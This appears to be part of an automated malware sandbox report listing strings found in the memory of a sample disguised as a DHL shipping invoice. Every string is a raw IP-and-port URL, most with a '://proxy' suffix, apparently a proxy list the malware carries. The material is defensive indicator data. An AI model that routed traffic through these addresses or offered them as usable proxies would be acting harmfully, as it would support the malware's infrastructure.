                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.46.34.20:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.111.194.25:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.111.194.25:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.188.101.205:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.188.101.205:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.188.169.169
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.188.169.169:59329
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.188.169.169:59329://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98174D000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.189.175.136:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98175E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.189.175.136:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.19.200.217:8090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.19.200.217:8090://proxyHJ
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.190.113.101:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.190.113.101:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.228.145.138:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.228.145.138:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.40.1.122:128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.40.1.122:128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.40.1.123:128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.40.1.123:128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.49.191.14:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.49.191.14:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.62.191.3:61456
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.62.191.3:61456://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.62.209.119:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.62.209.119:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.73.188.35:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.73.188.35:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.79.146.98:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://187.79.146.98:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.98.25:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.98.25:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.99.171
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.99.171://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.114.99.171:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.124.15.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.124.15.13:3629
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.124.15.13:3629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.124.230.43:17662
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.124.230.43:17662://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.203.106:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.221
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.221.133:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.221.133:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.12:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.12:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.14:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.14:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.166:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.166:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.167:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.167:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.171:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.171:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.194:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.194:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.38:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.38:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.3:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.3:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.44:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.44:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.51:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.51:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.9:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.132.222.9:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.133.155.215:1256
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.133.155.215:1256://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.164.193.178:11251
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.164.193.178:11251://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.164.196.30:64988
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.164.196.30:64988://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98174D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.164.196.31:49426
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98174D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.164.196.31:49426://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.164.197.178:55677
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.164.197.178:55677://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.164.197.178:55677p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.226.128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.226.128:59307
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.226.128:59307://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.252.198:2853
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.252.198:2853://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.252.198:5132
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.165.252.198:5132://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.234.144:19738
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.234.144:19738://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.252.135:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.252.135:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.30.17:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.30.17:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.56.246
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.56.246://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.166.56.246:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.168.24.222:81
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.168.24.222:81://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.255.244.83:52116
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.255.244.83:52116://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.34.164.99:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.34.164.99:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.64.113.104:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.64.113.104:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.68.236.126:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.68.236.126:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.95.20.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.95.20.138:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.95.20.138:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.16.248.226:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.16.248.226:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.201.189.2:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.201.189.2:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.163:9090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.163:9090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.168:9090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.168:9090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.169:9090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.169:9090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.171:9090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.171:9090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.50.111.105:3629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.50.129.43:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.50.129.43:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.85.112.20:7497
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.85.112.20:7497://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.90.255.208:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.90.255.208:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.177.131
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.177.131://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98074A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.177.131:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.104.26.227:33638://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980109000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.33:33633
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.33:33633://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.110.226.162
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.110.226.162://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.110.226.162:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.111.209.207:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.111.209.207:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.114.253.210:3389
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.114.253.210:3389://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9822A3000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.115.7.141:1982
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.115.7.141:1982://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.116.2.52
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.116.2.52://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.116.2.52:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.119.211.74:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981605000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.250.73:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9816D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.250.73:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.201.235:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.201.235:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.203.214:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.203.214:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.225.15:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.225.15:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.5.162:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.5.162:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.15.247.231:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.15.247.231:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.151.166.122:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.151.166.122:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.187.201.26:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.187.201.26:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.193.142.156:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.193.142.156:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98347B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.110.7:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.110.7:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.115.18:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.115.18:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.210.115:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.211.172
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.211.172.178:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.211.172.178:999://proxy
